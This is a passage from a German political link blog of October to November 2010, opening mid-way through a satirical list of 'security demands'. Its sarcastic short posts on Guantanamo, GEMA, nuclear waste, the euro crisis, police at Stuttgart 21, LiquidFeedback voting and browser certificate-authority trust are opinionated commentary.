2. Besondere Gefährder (unserer Freiheiten) wie Innenminister und Polizeipräsidenten sollten ab sofort im Atombunker unter Dauerverschluss bleiben, schon zu ihrer eigenen Sicherheit. Kommunikation mit der Außenwelt müssen wir verhindern, damit sie nicht von Terrordrohungen beeinflusst werden können, denn das ist ja genau das, was die Terroristen wollen!
3. Der Fahr- und Flugdienst des Bundestages muss aus Sicherheitsgründen sofort eingestellt werden. Abgeordnete können übergangsweise in der Tiefgarage übernachten, Schlafsäcke werden gestellt.
4. Die Gefahr durch deutschstämmige Panikmacher wächst ständig, und wir sind es unseren Kindern schuldig, hier hart und kompromisslos durchzugreifen. Keinen Zugang zu Computern und Telefonen mehr für Parteien und Parteipolitiker!
5. Im Übrigen fordere ich ein Verdummungsverbot für Problempolitiker und eine vollständige Vorratsdatenspeicherung für Abgeordnete und alles von Ministerialdirektor an aufwärts (und zwar auch die Inhalte, nicht nur die Trafficdaten!). Selbstverständlich so, dass die Öffentlichkeit jederzeit ohne Angabe von Gründen Einblick nehmen darf. Es geht hier schließlich um die Sicherheit!
6. Desweiteren können wir ja auch, wenn unsere Politiker nicht mehr ihren Bunker verlassen, das Flugsicherheitstheater rückstandsfrei entsorgen. Die freigewordenen Analproben- und Nacktscanner-Ressourcen verschieben wir zur Erhaltung der Arbeitsplätze in den Bundestag, wo sie an den Lobbyistenzugängen in Reihe geschaltet werden.
7. Um wirtschaftlich motivierte Terrordrohungen zu unterbinden, wird der Derivathandel bei Terrorwarnungen für 23 Tage ausgesetzt, und auch rückwirkend rückgängig gemacht, wenn doch eine durchrutscht. Es darf nicht länger möglich sein, dass skrupellose Politiker und Lobbyisten aus Terrorpanik Profit schlagen!
8. Alle zukünftigen Vorschläge für Sicherheitstechnologien müssen vorher fünf Jahre lang extensiv (mindestens fünfmal täglich) an allen Abgeordneten und Lobbyisten im Bundestag und den Landtägen angewendet werden, damit man auch sicher weiss, ob sie funktionieren.
Zum Zeichen unserer Kompromissbereitschaft sind wir bereit, bei einer dieser Forderungen geringfügig Abstriche in Kauf zu nehmen, selbstverständlich bei entsprechender Gegenleistung an anderer Stelle. Z.B. Betten statt Schlafsäcke in der Tiefgarage. Wir sind ja mindestens genau so kompromissfähig wie Schäuble und De Maiziere!
[l] Der erste Guantanamo-Prozess hat in den USA stattgefunden. Und es ist genau so eine Farce, wie man erwartet hätte. Von ihren 286 (!) Anklagepunkten mussten sie 285 (!!) fallenlassen. Übrig blieb nur "Verschwörung zur Zerstörung von US-Eigentum". "Verschwörung zu" ist in den USA das Gummiparagraphenäquivalent zu unseren kriminellen und terroristischen Vereinigungen. Insbesondere: wenn sie ihm nur "Verschwörung zu" vorwerfen, dann hat er nichts tatsächlich kaputtgemacht, sondern war nur befreundet mit jemandem, der es getan hat, oder hat den da hingefahren oder so.
Naja, würde man sich jetzt denken, wenn die dem so wenig nachweisen können, dass es nur bis zu so einer Muppetshow-Verurteilung reicht, dann kriegt der bestimmt noch Geld raus nach Anrechnung seiner Guantanamom-Haft. Dem ist nicht so:
Der Staatsanwaltschaft zufolge wird es zwischen 20 Jahren Gefängnis und lebenslanger Haft betragen.
ZWANZIG JAHRE KNAST für so einen lächerlichen Straftatbestand! Da sieht man mal, wie weit her das in den USA mit dem Rechtsstaat ist. Unglaublich.

Wed Nov 17 2010

[l] Nicht zu fassen: Der Zoll hält 40k "Heatballs" auf. Wer das nicht kennt: das sind Glühbirnen, die als Heizgeräte verkauft werden, damit sie nicht unter das Glühbirnenverbot fallen.
Am Dienstag hat der Zoll nach einem Hinweis der Bezirksregierung Köln, Dezernat 55 für Produktsicherheit und Sprengstoff, die neue Lieferung mit 40.000 Heatballs gestoppt. „Wir haben nie ein Geheimnis aus unserer Aktion gemacht und ganz offen den Behörden gesagt, dass die Lieferung kommt“, sagt Rotthäuser. Aus der Bezirksregierung Köln hat er aber von „massivem Druck“ des Landesumweltministeriums erfahren.
Sprengstoff, ja? Das ist alles, was denen eingefallen ist? Sprengstoff?! m(

Mon Nov 15 2010

[l] Der RAV hat mal eine Liste der Rechtsbrüche der Polizei beim Castortransport gemacht.

Fri Nov 12 2010

[l] Ah, neulich fragte ich noch, wer unser nächstes Griechenland ist, weil der Dollar gegenüber dem Euro gerade zu billig ist. Jetzt sieht es so aus, als sei Irland der "Gewinner".
Die Geldreserven reichen höchstens bis zum Sommer, dann könnte Irland ein ähnliches Schicksal drohen wie Griechenland: Das Land muss sich gegen Spekulanten wehren, die Zinsen für seine Schulden steigen und steigen. Dafür hat die Regierung nun einen Mitschuldigen ausgemacht - Angela Merkel.
Gut zu sehen, dass unsere Regierung alles im Griff hat!1!!
Und hey, wir haben ja noch ein paar mehr EU-Mitglieder, das Spielchen können wir noch eine Weile treiben.
Update: Noch ein Irland-braucht-einen-Bailout-Artikel.

Thu Nov 11 2010

[l] Die Charmeoffensive der GEMA geht weiter: Jetzt verfolgt die GEMA schon Laternenumzüge. Kindergärten! Haben die eigentlich gar keine Scham da? Wie können solche Leute überhaupt mit sich leben? Da wäre ich ja lieber arbeitslos, als wegen Laternenumzügen gegen Kindergärten vorzugehen. Meine Fresse. Wi-der-lich. (Danke, Philipp)

Tue Nov 9 2010

[l] Das Französische Modell für Atommüllentsorgung: ins Meer leiten.
Dieses Rohr hier führt ins Meer. Es ist viereinhalb Kilometer lang. Über dieses Rohr leitet Cogema jedes Jahr so viel radioaktives Abwasser ins Meer, wie in 33 Millionen 100-Liter-Fässer passt.
Toll, wie gut wir Menschen die Atomenergie im Griff haben!1!!
Oh und den Rest schicken sie nach Sibirien. Das ist zwar verboten, Atommüll zu exportieren, aber sie haben das einfach umdeklariert. Das heisst jetzt "verwertbares Material".
Aber hey, wenn Russland so blöde ist, sich Atommüll andrehen zu lassen, dann will natürlich auch Schwarz-Geld unseren Atommüll nach Russland packen. Hey, warum lagern wir den Müll nicht in Tschernobyl? Synergien nutzen und so!1!! (Danke, Max, Tim)
[l] Zitat des Tages: Bundesumweltminister Röttgen ist gegen Castor-Sitzblockaden. Begründung:
Bundesumweltminister Norbert Röttgen (CDU) kritisierte die Sitzblockaden als nicht legitim. „Das ist keine juristische, sondern eine politische Aussage, weil Sitzblockaden darauf abzielen, dass der eine Bürger dem anderen seinen Willen aufzwingt“, sagte er dem Sender n-tv.
Nee, klar, und wo kämen wir da hin, wenn z.B. die CDU den Bürgern von Stuttgart einen Bahnhof aufzwingt, oder der Gesamtbevölkerung Atomenergie oder Pharmaderegulierung oder Hartz IV oder was die sonst so gemacht haben die letzten Jahrzehnte. (Danke, Alexander)
[l] Alice Schwarzer kloppt auf Frau ~~Köhler~~ Schröder ein, da kann es nur Gewinner geben. Ich habe ja jeglichen Restrespekt vor der Schwarzer verloren, seit sie a) Werbung für die "Bild" gemacht hat und jetzt auch noch b) beim Kachelmann-Verfahren für "Bild" den Kampfhund gibt.
Update: Und wer stellt sich hinter Frau Köhler? Kommt ihr NIE drauf! Silvana Koch-Mehrin.

Sun Nov 7 2010

[l] Auch die Briten orientieren sich an unserem Vorbild und führen unbezahlte Zwangsarbeit ein. Das haben wir ja prima gemacht, wie wir da überregional die ethischen Mindeststandards gesenkt haben. Ich bin stolz auf uns. (Danke, Oliver)
[l] FEM bittet um Spenden für ihr Videoequipment. FEM, das sind die Leute, die in den letzten Jahren die Congress-Videos u.a. für den Chaos Communication Congress gemacht haben. Wer also helfen will, dass die Videos noch bessere Qualität kriegen, der ist herzlich aufgerufen, da ein paar Kröten hinzuüberweisen. Die Videos werden auch weiterhin kostenlos im Netz downloadbar sein, und das sollte uns allen was wert sein, oder?
[l] Aha, SO entwerten wir den Euro: Der "European Financial Stability Fund", eine frisch gegründete Bank in Luxemburg, verteilt Geld an die ganzen EU-Länder. Der Trick ist, dass diese Bonds dann AAA-Rating kriegen, obwohl da auch Anleihen an Länder wie Griechenland bei sind. Erinnert das jemanden an was? Na? Genau! Der Trick, mit dem sie die Junk-Hypotheken zu "strukturierten Wertpapieren" gemacht haben! Hey, immerhin ist das "proven technology", da weiß man, dass es (nicht) funktioniert!
So und jetzt denkt mal eine Runde weiter. Deren Bonds sind AAA, also können sie sie bei der EZB als "Sicherheit" hinterlegen, um sich mehr Geld zu leihen, und damit dann mehr Schatzbriefe zu kaufen. Bis das alles platzt. Was wir hier also haben ist der selbe Kreislauf wie in Amerika: dass am Ende die EZB die Schatzbriefe der EU-Länder "kauft". Nur läuft das bei uns durch diese Firma, damit es nicht so offensichtlich ist, und übrigens: der Direktor ist ein Deutscher. Das ist also ein Plan von Deutschland, um die anderen Länder vollständig von sich abhängig zu machen, und den Euro in den Keller zu drücken.
Lustigerweise hat die Merkel den Aspekt noch nicht so kapiert und faselt da was von "die Investoren müssen den Bailout bezahlen". Das hat natürlich erstmal die Investoren in Panik versetzt und die Schatzbriefe der anderen Länder abstürzen lassen. Ist ja auch klar, wenn die Investoren da nach marktwirtschaftlichen Gesichtspunkten entscheiden müssten, wem sie noch ihre Schatzbriefe abkaufen wollen, dann hätten Länder wie Portugal, Spanien oder Griechenland keine Chance.

Fri Nov 5 2010

[l] Ich bin ja generell kein Freund von Werbung, aber in diesem Fall muss ich mal eine Ausnahme machen und diese großartige Sony-Werbung verlinken. Das ist so großartig, dass ich gleich mal einen Screenshot gemacht habe, um das für die Nachwelt zu archivieren. Da hat doch ernsthaft die Contentmafia-Abteilung von Sony bei Youtube die Werbung der LCD-Fernseher-Abteilung entfernen lassen. Super, Sony! Überzeugender hätte ich auch nicht darlegen können, wieso die Contentmafiosi alle sterben müssen.
Update: Mir erklärt gerade jemand, dass hier nicht Sony sich selbst beschossen hat, sondern die GEMA hat Sony ihre Werbung gesperrt. Wenn Sony etwas entfernen lässt, steht da sowas wie "removed due to terms of use violation", wenn die GEMA etwas blockieren lässt, steht da "not available in your country". Nun steht da in diesem Fall "containts content from Sony Music Entertainment", das wundert mich ja ein bisschen, wieso die GEMA das dranschreiben würde dann. (Danke, Florian)

Wed Nov 3 2010

[l] Es geht wieder los mit dem Wahlbetrug in den USA. Da sieht es ja im Moment so aus, als würden die Democrats die Mehrheit im Congress kriegen. Und verdient, natürlich, weil sie genau so wenig für die Bürgerinteressen getan haben wie die Republikaner. Aber sie haben vorher Hoffnung gemacht. Dadurch fühlen sich die Leute jetzt verraten, und natürlich zu Recht. Von den Republikanern erwartet ja schon gar keiner mehr was anderes. Und wenn man sich schon in den Abgrund stürzen lässt, dann wenigstens von jemand, der dabei ehrlich ist. Mir tut ja der Obama fast ein bisschen leid. Bei Teilen von seinen Vorhaben hatte man ja tatsächlich den Eindruck, er habe ehrlich versucht, seine Wahlversprechen einzuhalten. Aber musste sich da genau so durch die widerlichen Demokraten in Congress und Senat kämpfen wie durch die Republikaner. Ich persönlich wäre da auch für die "alle auf den Mond schießen"-Option.

Fri Oct 29 2010

[l] Hihihihi, großartig: Der Deutsche Kulturrat ist empört — EMPÖRT!! —, dass die Internet-Enquete-Kommission keinen Vertreter von der Contentmafia eingeladen hat. Ich hatte ja bisher eine eher geringe Meinung von der Internet-Enquete-Kommission, aber damit haben sie ein-zwei Sympathiepunkte gutgemacht. :-)
[l] Wisst ihr, wer jahrelang die NS-Aufklärung behindert hat? Kommt ihr nie drauf! Die "Bürgerrechte"-Partei FDP. Komisch, wie kommt das eigentlich, dass so häufig wenn jemand laut Freiheit brüllt, am Ende Nazis und Kriminelle dahinterstecken? Die FDP hat da halt ihre ganzen Adligen aus der NS-Zeit schützen wollen, die sich im Auswärtigen Amt einen schönen Lebensabend gemacht haben.
Die Wissenschaftler der Historiker-Kommission berichten von Netzwerken NS-Belasteter, die weit in die FDP reichten. Noch in den frühen siebziger Jahren hätten sie versucht Täter zu schützen.
Überraschung! Die wussten halt, wie angreifbar sie alle selber sind, daher haben sie sich gegenseitig geschützt. So ist das halt im Gefängnis und bei der Prügelpolizei.
Pikanterweise waren sowohl Genscher wie Scheel NSDAP-Mitglieder.
Keine weiteren Fragen.
Update: Zur Illustration eignet sich dieses schöne FDP-Plakat von 1949.

Thu Oct 28 2010

[l] Vier S21-Wasserwerferopfer haben Klage eingereicht, um die Rechtswidrigkeit des Polizeieinsatzes feststellen zu lassen. In einem Rechtsstaat würde jetzt was passieren? Die Ermittlungen würden losgehen, man würde Zeugen befragen, und die Kläger würden von der Polizei demonstrativ in Ruhe gelassen werden.
Was passiert aber bei uns? Die Polizei macht bei denen Hausbesuche, um sie zu bedrohen.
Noch vor Einreichen seiner Klage seien am Mittwoch drei Polizisten an seiner Wohnungstür erschienen und hätten ihm angedroht, ihn notfalls mit Gewalt als Zeuge der Staatsanwaltschaft zuzuführen, sagte er am Donnerstag der taz.
Aber komischerweise haben sie versäumt, ihm auch nur eine Vorladung zuzustellen vorher. Im Übrigen kann man Vorladungen der Polizei generell ohne Angabe von Gründen ignorieren, erst wenn die Staatsanwaltschaft vorläd, dann wird es ernst.
Das Auftreten der Polizisten beschreibt der 31-Jährige als "überfallartig und einschüchternd". Nur widerwillig sei ihm gestattet worden, seinen Anwalt anzurufen. Auch während des Telefonats mit der Anwaltskanzlei hätten die Polizisten Druck gemacht und gesagt, dass sie nun körperlichen Zwang anwenden würden, wenn er nicht bald fertig sei.
Angesichts solcher Schilderungen frage ich mich immer, ob die angeblichen arabischen Kriminellenbanden wirklich so viel schlimmer wären als was wir jetzt mit der Polizei haben. Man müsste das mal ausrechnen, was die so an Schutzgeld haben wollen, und was wir so für die Polizei ausgeben. Ich kann mich jedenfalls an keinen einzigen Fall erinnern, bei dem mir die Polizei mal geholfen hätte. Nicht dass ich mir von den Arabern Hilfe erwarten würde, aber wenn mir schon keiner hilft, dann kann ich ja wenigstens meine Kosten dafür zu minimieren versuchen!1!! :-)
Oh und wer jetzt denkt, hey, das ist nur die Polizei, die bei uns so schlimm ist… auch die Staatsanwaltschaft kriegt ihr Fett weg:
Nachdem er zu Protokoll gab, nicht ohne anwaltliche Beratung auszusagen, habe ihm der Staatsanwalt gedroht, die nächste Befragung werde "unangenehmer" ausfallen.
Das muss man sich mal auf der Zunge zergehen lassen! Als ich neulich in der Zeitung las, Stuttgart sei eine Mafia-Hochburg, da dachte ich ja nicht, dass das so wörtlich zu nehmen ist! (Danke, Florian)
[l] Oh schön! Gestern haben Frank und ich uns noch Sorgen gemacht, dass die Guttenbergs Kanzler werden könnten. Und jetzt macht uns die Meldung hier wieder Mut, dass die CSU in Bayern eine landesweite Sperrstunde einführen will. Die Nachwuchssituation muss ja verheerend sein, wenn sie das bisschen verbleibenden Nachwuchs mit so einer Regelung zu amputieren gewillt sind. (Danke, Julius)

Wed Oct 27 2010

[l] Zum Castor gibt es wieder einen Bundeswehreinsatz im Inneren. Das habt ihr davon, die CDU an die Macht zu lassen. Früher war das noch klar verfassungswidrig und wurde nicht gemacht, heute ist das immer noch klar verfassungswidrig aber das stört niemanden.
Update: Kasernen und Verpflegung, keine Tornados.

Tue Oct 26 2010

[l] Angesichts der aktuellen Sparvorschläge von Schwarz-Geld hat sich auch attac mal Gedanken gemacht und kam auf folgenden Vorschlag: Attac fordert: Kiffen für die Rüstungsindustrie. (via).

Fri Oct 22 2010

[l] Nachdem der Wulff ja offensichtlich gerade installiert wurde, um Deutschland zu einem christlichen Gottesstaat zu machen, scheitern auch in der SPD Ansätze, einen laizistischen Arbeitskreis zu gründen, am Widerstand von der katholischen Kirche und von Sigmar Gabriel. WTF?!
Ich denke ja mehr und mehr, dass die CDU den Wulff und nicht den Gauck zum Präsidenten gemacht hat, weil ihnen die Verfestigung von "christlichen Werten" wichtiger waren als die Ausbeutung und Kleinhaltung der Hartz IV-Opfer, denn die haben sie ja auch so gut im Griff gerade, da brauchen sie keine Hilfe vom Bundespräsidenten mehr.
Das Money Quote aus ersten Link ist der letzte Absatz:
Wenn die Rückkehr des Glaubens in die Politik die präsidiale Botschaft aus Ankara ist, dann stehen wir vor einem neuen Religionsstreit in unserem Staat. Und der Präsident hat ihn weit hinten in der Türkei in schlichter Rede vom Zaun gebrochen.
[l] Zu dieser Liquidfeedback-Sache kommen immer noch Mails rein. Besonders humoristisch wird es bei dem Typ, der den Ursprungs-Antrag gestellt hat, und mir dazu eine Mail an die Bloginput-Adresse gesendet hatte, und jetzt sauer ist, dass ich den Bloginput ins Blog getan habe. Er und noch ein-zwei andere Leute schreiben mir, ich hätte LQFB nicht verstanden. Das finde ich ja besonders lustig, der Dunning-Kruger-Effekt live und in Farbe!
Die Kritik an LQFB hängt an einem Punkt: dass die Abstimmungen damit nicht geheim sind. Stimmt. Sind sie nicht. Das ist die Idee dabei. DAS IST DIE IDEE DABEI! Denn die Wahlrechtsgrundsätze kann man mit Computern nicht sicher umsetzen. Der CCC kämpft seit Jahren gegen Wahlcomputer, deren Hersteller das auch nicht verstanden haben. Es geht nicht. Merke: ich sage nicht "ich kann es nicht", ich sage "es geht nicht". NIEMAND kann das. ES GEHT NICHT.
Daher ist das ein großer Schritt bei LQFB, dass die da sagen, hey, wir machen keine geheime Abstimmung. Naja, so groß auch wieder nicht, denn DAS GEHT NICHT. Das ist genau der einzige Punkt, der LQFB interessant macht, denn wenn man das abschafft, dann ist man wieder bei Wahlcomputern, und dann müsste der CCC LQFB bekämpfen anstatt es wohlwollend zu beobachten. Merke: das ist keine verhandelbare Sache. Keine Menge an Verhandlung kann diese Fakten umstoßen oder auch nur ankratzen. Egal wie viel Krypto man auf die Sache wirft. Es geht nicht, also versucht man es gar nicht erst. Das ist LQFB. Denn wenn man sich von der Idee verabschiedet, dass man eine geheime Wahl machen kann, und sagt, dass das nur für die Partei intern ist, dann gehen plötzlich Sachen wie Nachprüfbarkeit politischer Positionen, Wortbrecher erkennen, Schutz gegen Wahlbetrug, Schutz gegen Korruption, und eben flüssige Delegation mit Rechenschaft.
Klar, geheime Wahlen haben auch Vorteile. Große Vorteile. Streite ich ja gar nicht ab. Z.B. kann da keiner sehen, dass du immer pro Abtreibung und Schwulenrechte abstimmst, während du offen konservativer Evangelikaler bist. Und geheime Wahlen schützen auch vor Korruption in Form von Wählerbestechung. Aber, und ich sage das hier nochmal, damit es wirklich jeder kapiert: DAS GEHT NICHT mit Computern. Geheime Wahlen ohne Möglichkeiten für Wahlbetrug geht nicht mit Computern. Auch ohne Computer ja nicht wirklich, aber da ist das halbwegs managebar. Daher sind alle Gefühle von "wir haben da was verloren" unangebracht. Wir haben nichts verloren. Das geht nicht. Findet euch damit ab und hört auf, das als Verlust zu sehen. Wir hatten es nie. Also haben wir es auch nicht verloren.
Nun, ein Detail gibt es noch zu LQFB. Hat mir jemand gemailt, gebe ich mal ungeprüft weiter. Es gibt ca 6000 zahlende Parteimitglieder, die also abstimmungsfähig wären. Im LQFB haben sie aber 13k Leute. Das ist natürlich völlig für den Arsch, dann kann man die Ergebnisse in der Tat in der Pfeife rauchen. Bzw könnte man, wenn man nicht den LQFB-Vorteil hätte, dass alles zurechenbar ist. Man könnte also ein Perl-Skript schreiben, das nur die Stimmen der Stimmberechtigten rechnet, kaskadierend durch die Delegationsstufen. Technisch gar kein Problem, denn wir haben ja die Accounts, die zugeordnet werden können. Noch. Bald ja nicht mehr. Und dann haben wir die Nachteile von herkömmlichen Wahlcomputern mit den Nachteilen von "zu viele Leute haben Accounts" kombiniert, ohne in den Genuss irgendeines Vorteils zu kommen. Gute Arbeit, lieber Bundesvorstand der Piraten. Gute Arbeit!
Update: Aus verschiedenen Richtungen kommen jetzt hier andere Zahlen rein, die ich auch alle nicht prüfen kann :-)
Es gibt etwa 13k Mitglieder, an LF angemeldet sind etwa 3.100, von denen haben aber etwas über 1000 noch nie etwas in LF getan, bleiben etwa 2000 übrig, die schon mal tätig waren. Aktiver (d.h. mindestens 10 verschiedene Dinge) waren bislang etwa 1000 Leute, d.h. weniger als 10% aller Mitglieder. Bei Abstimmungen gibt es in der Regel etwa 400 Stimmen (d.h. 3-4% aller Mitglieder beteiligen sich in LF pro Initiative)
Seufz. Demokratie ist deprimierend.
[l] Ach nee gucke mal, der Thomas Mohr von der Gewerkschaft der Polizei, der gestern bei Monitor im Interview war, … den hat sein Aufsprechen die Karriere gekostet.
Auch Ministerpräsident Stefan Mappus habe „die Stimmung noch unnötig aufgeheizt“ und nun werde die baden-württembergische Polizei als „Kinderschläger und Kinderschänder“ beschimpft. „Die Politik trägt die Schuld an dieser unnötigen Eskalation“, sagt Mohr, der am Mittwoch plötzlich zum Innendienst abkommandiert und im Intranet der Polizei als Nestbeschmutzer angeprangert wurde.
Tolles Land haben wir da, wo so etwas möglich ist. Leute wie der Mohr werden sanktioniert, kommen in den Innendienst, aber jemand, der auf einer Demonstration mit dem Wasserwerfer Passanten die Augen rausschießt, dem klopft man noch auf den Rücken, weil er seinen Job so gut gemacht hat.
Update: WTF, der FR-Artikel ist plötzlich weg. Na super. Dann guckt halt hier.

Thu Oct 21 2010

[l] Die GEMA verlangt jetzt schon Schutzgeld von Kindergärten. Wo bleibt eigentlich die Revolution?

Sat Oct 16 2010

[l] Heute hat sich die "Heute Show" über "Tatort Internet" lustig gemacht. Ihr erinnert euch, die letzte Bastion des Journalismus beim ZDF? Hier kann man sich die Sendung anschauen, ab 21:50 geht es um RTL2. Aber der Rest der Sendung schadet auch nicht. Da haben sie z.B. einen wunderbaren Clip, in dem Trittin (als er noch an der Regierung war) sagt, Grüne sollte nicht gegen einen Castor-Transport demonstrieren. (Danke, Erik)

Thu Oct 14 2010

[l] Das ging ja fix: Die Franzosen haben blitzschnell ein Gesetz gemacht, um Free zum Zustellen der HADOPI-Mails zu zwingen. Da sieht man mal, wie einfach das mit dem Gesetzemachen auch in einer "Demokratie" gehen kann, wenn man nur will!1!!
Update: Aha, das war gar kein Gesetz, sondern ein "Dekret". Wie damals beim Sonnenkönig. Das scheint ja auch ansonsten dem Selbstbildnis der Regierung Sarkozy zu entsprechen.

Wed Oct 13 2010

[l] Das OLG Koblenz hat 1&1 die AGBs filettiert. Das ganze läuft jetzt seit April 2007, seit die Berliner Verbraucherzentrale die abgemahnt hat.
[l] Das Verwaltungsgericht Wiesbaden hat dem BKA die Weitergabe von Daten von Journalisten an die Nato verboten. Das hat das BKA 2009 gemacht, und daraufhin hat die Nato denen dann die Akkreditierung verweigert. Die Begründungen sind selbst für BKA-Verhältnisse auffallend absurd, ich zitiere mal die kürzere:
Er sei 2004 auf einer Demonstration auffällig geworden. “Das ist die gleiche Begründung, mit der mir 2007 in Heiligendamm die Akkreditierung verweigert wurde”, sagt Majchrzak.
Auffällig geworden, auffällig geworden, das erinnert mich ja direkt an diese Geschichte beim Lawblog, auch wenn da von "in Erscheinung getreten" die Rede ist. Ob es da einen materiellen Unterschied gibt?

Sat Oct 9 2010

[l] Alternativlos Sendung 6 ist jetzt online. Es ist wieder eine Sondersendung zum Thema Polizeigewalt und wie die Polizei eigentlich so funktioniert auf Demoeinsätzen, was die so für Taktiken und Ausrüstung haben. Außerdem erklären wir mal, was Netzneutralität ist, und warum das alles nicht so einfach ist.
Der erste Teil ist uns etwas ausgeufert und dauert knapp 90 Minuten. Wir haben daher eine Umfrage gemacht, ob ihr lieber eine lange oder zwei Sendungen haben wollt, und die Mehrheit war für eine Sendung. Das Schneiden hat etwas länger gedauert, weil wir noch einen Abschnitt rausnehmen mussten *hust*

Wed Oct 6 2010

[l] Das Verwaltungsgericht Schwerin gibt den Opfern von Polizeientführungen bei Heiligendamm Recht.
3 Jahre nach dem G8-Gipfel in Heiligendamm bestätigt das Verwaltungsgericht Schwerin in einer Vielzahl anhängig gemachter Klagen, dass die Ingewahrsamnahmen und die Haftbedingungen rechtswidrig waren und Betroffenen zu Unrecht Telefonate mit Vertrauenspersonen und RechtsanwältInnen verweigert wurden.
Natürlich! Das war ja eh die ganze Zeit allen klar. Die haben das damals einfach trotzdem gemacht, obwohl das klar rechtswidrig war. Um Macht zu demonstrieren und die Demonstrantenherde auszudünnen. Schade nur, dass jetzt keiner der zuständigen Politiker in den Knast muss für ihre damaligen Untaten. Aber hey, das geht nicht. Das wäre ja … gerecht.

Sun Oct 3 2010

[l] Frank und ich hatten uns neulich gefragt, wie sie eigentlich die S21-Demonstranten aus den Bäumen gekriegt haben. Einfach mit dem Wasserwerfer? Nein, das geht nicht, das haben wir direkt verworfen, denn wenn die da runterfallen und sich was brechen, das geht ja nicht.
Stellt sich raus: geht nicht nur doch, haben sie gemacht!
Meine Meinung von diesem "Rechtsstaat" sinkt echt jeden Tag noch ein bisschen.
Update: Mir mailt gerade jemand, dass er auf einem der Bäume draufsaß, und dass die da nicht auf die Bäume gefeuert haben sondern zwischen den Bäumen durch wild in die Menge. (Danke, Mark)
[l] Wer sich dachte, die Roma, die der Sarkozy da ausweist, das sind ja immer noch Europäer, die haben in der EU genau wie wir alle das Recht, sich aufzuhalten, wo sie wollen, die können einfach zurückkommen nach Frankreich nach der Deportation: Die Sorge hat auch Sarkozy und lässt ihre Fingerabdrücke aufnehmen. Sie dürfen nämlich in der Tat nicht verhindern, dass die Roma zurückkommen, und sie dürfen sie auch nicht rausschmeißen, also ist das auch gerade keine "Deportation" sondern eine "Rückreisehilfe". Da kriegen die Roma Geld für, dass sie sich abschieben lassen. Und mit den Fingerabdrücken soll ihnen deutlich gemacht werden, dass die Franzosen nicht so doof sind, für die Abschiebung derselben Roma mehrfach Geld auszugeben.
Na mal gucken, ob die Rechnung aufgeht.
[l] Jedes Mal, wenn ich hier auf die https-Version dieses Blogs verlinke, dann kriege ich gefühlte 3000 Mails von Lesern, die von den Terrorpanik-Warndialogen ihres Browsers erschlagen wurden.
Daher erkläre ich mal. Wenn man eine https-Webseite einrichtet, braucht man ein Zertifikat. Wenn sich der Webbrowser zum https-Server verbindet, zeigt ihm der Server dieses Zertifikat. Der Browser guckt dann, ob das aktuelle Systemdatum innerhalb des im Zertifikat stehenden Gültigkeitsdatumsbereichs ist (aktuell ist das bei mir 28.8.2010 bis 24.2.2011), und ob das Zertifikat von jemandem unterschrieben ist, der im Browser als vertrauenswürdig eingetragen ist. Browser kommen mit einer mehr oder weniger langen Liste von vertrauenswürdigen Zertifikaten. Ich hatte das auch kurz bei Alternativlos Folge 5 erklärt. Da sind lauter suuuper vertrauenswürdige Zertifikats-Aussteller drin wie z.B. Verisign (und deren Tochterunternehmen Comodo, Thawte, GeoTrust, …), der bekannteste. Verisign ist so nahe an der US-Regierung dran, dass sie u.a. auch die DNS Top Level Domains .com und .net betreiben dürfen. Wie bei Alternativlos empfohlen, sollte sich jeder mal die Zeit nehmen, in seinem Browser die Liste der Zertifikate anzugucken. Bei Firefox guckt man in die Preferences, das Advanced Tab, dann das Encryption Unter-Tab, dann den View Certificates Knopf drücken, und in dem neuen Fenster das Tab "Authorities" öffnen. Da mal durchscrollen. JEDER von denen ist für den Browser vertrauenswürdig. Da ist z.B. auch die Deutsche Telekom dabei. Wenn jetzt z.B. die Bundesregierung gerne eure verschlüsselte Kommunikation abhören wollte, würden sie der Telekom einfach sagen, hey, macht uns mal ein Zertifikat für den Banking-Webserver der Sparkasse oder wo auch immer ihr euch so hinverbindet, auch Email und Jabber benutzen SSL. Und euer Browser würde sehen, dass deren Zertifikat von der Deutschen Telekom unterschrieben ist, und würde es kommentarlos akzeptieren.
Neben der US-Regierung und der Bundesregierung sind da auch noch die Chinesen am Start ("CNNIC"), die Contentmafia ("AOL Time Warner Inc."), America Online (nein, wirklich!), TÜRKTRUST, die Bankenmafia (VISA, Wells Fargo, …), die Schweizer ("Swisscom"), Geert Wilders ("Staat der Nederlanden"), die Schweden und Finnen ("Sonera"), die Japaner, Intel und Microsoft. Das hängt auch von der Browserversion ab. Aber es ist wichtig, dass ihr versteht, dass jeder von denen, wenn er wollte, eure Email mitlesen könnte, indem er euch ein ungültiges (also ein von ihnen generiertes, von ihnen unterschriebenes, und daher vom Browser akzeptiertes) Zertifikat vor die Nase hält.
So, wenn ich jetzt einen SSL-Dienst einrichte, und ich möchte, dass das in eurem Browser ohne Terrorpanikmeldung funktioniert, dann kann ich einem der Kommerzanbieter ein paar Euro in die Hand drücken, und der gibt mir dann ein Zertifikat, das ein Jahr gültig ist. Marktführer ist Godaddy, da zahlt man pro Jahr pro Domain sowas wie $30.
Wer das noch nie gemacht hat: das geht so. Man geht dahin, gibt Daten in ein Webformular ein, gibt denen die Kreditkartennummer, und bei denen wirft sich dann ein Perl-Skript an, das das Zertifikat generiert. Die haben genau Null Arbeit. Zum Validieren schicken sie eine Mail an eine Mailadresse bei der Domain, üblicherweise sowas wie postmaster@ oder root@ oder webmaster@, in der Mail ist ein Link drin, den klickt man dann, und dann glaubt einem der Anbieter, dass man berechtigt ist, für die Domain ein SSL-Zertifikat zu haben. Mehr ist da nicht dabei. Ein Perl-Skript.
Nun habe ich aus grundsätzlichen Erwägungen heraus ein Problem damit, Leuten Geld für so eine Schutzgeldnummer zu geben, bei der die Gegenseite nichts tut, das ich nicht auch mal schnell selber hätte machen können. Die einzige Sache, die die von mir trennt, ist dass die eine Mail an Mozilla und Microsoft und Opera geschickt haben, um in die Liste der vertrauenswürdigen Aussteller aufgenommen zu werden. Ich habe mal herauszufinden versucht, was für Anforderungen die Browserhersteller an einen stellen, wenn man auf die Liste will. Die Details hängen vom Browser ab, aber ich will das mal so zusammenfassen: keine erwähnenswerten.
Wenn ich nun nicht einsehe, so einer Firma für das Aufrufen eines Perl-Skripts Geld zu geben, dann bleiben zwei Optionen, um eine SSL-Site zu kriegen. Ich kann mir selber ein Zertifikat machen und selbst unterschreiben. Oder ich kann zu cacert.org gehen, die bieten kostenlose Zertifikate an. In beiden Fällen gibt es von den Browsern einen großen roten Terrorpanikdialog. Der bei Firefox involviert inzwischen ein halbes Dutzend Interaktionen, bevor Firefox ein ihm unbekanntes Zertifikat erlaubt.
